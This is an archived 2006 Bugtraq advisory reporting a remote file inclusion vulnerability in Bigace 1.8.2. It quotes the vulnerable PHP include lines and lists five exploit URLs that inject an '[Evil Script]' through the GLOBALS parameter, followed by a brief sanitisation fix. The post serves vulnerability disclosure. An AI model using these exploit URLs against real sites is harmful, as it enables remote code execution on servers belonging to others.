| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 26 Aug 2006 08:14:15 -0000
From: vampire_chiristof@...oo.com
To: bugtraq@...urityfocus.com
Subject: Bigace 1.8.2 (GLOBALS) Remote File Inclusion
Author : Vampire
Location : Iran - Tehran
HomePage : http://www.hackerz.ir
Email : Vampire_chiristof[at]yahoo[dot]com
Critical Level : Dangerous
------------------------------------------------------------------------
---------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Bigace
version : 1.8.2
URL : http://Bigace.sourceforge.net
------------------------------------------------------------------------
---------------
Vulnerability:
~~~~~~~~~~~~~
in download.cmd.php , admin.cmd.php , upload_form.php We Found Vulnerability Script
----------------------------------------admin.cmd.php-----------------------
---------------
....
<?php
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'styling.php');
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'functions.inc.php');
include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');
?>
...
----------------------------------------download.cmd.php-----------------------
---------------
....
<?php
include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');
?>
...
----------------------------------------upload_form.php-----------------------
---------------
....
<?php
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');
?>
...
----------------------------------------item_main.php-----------------------
---------------
....
<?php
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');
?>
...
Exploit:
~~~~~~~
http://www.target.com/[Bigace]/system/admin/include/item_main.php?GLOBALS=[Evil Script]
http://www.target.com/[Bigace]/system/admin/include/upload_form.php?GLOBALS=[Evil Script]
http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]
http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]
http://www.target.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil Script]
Solution:
~~~~~~~~
Sanitize Variabel $GLOBALS in download.cmd.php , admin.cmd.php , item_main.php , upload_form.php
------------------------------------------------------------------------
----------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friends Cephexin , Sh3ll , MFOX , Alijbs and All Real Hackers
Powered by blists - more mailing lists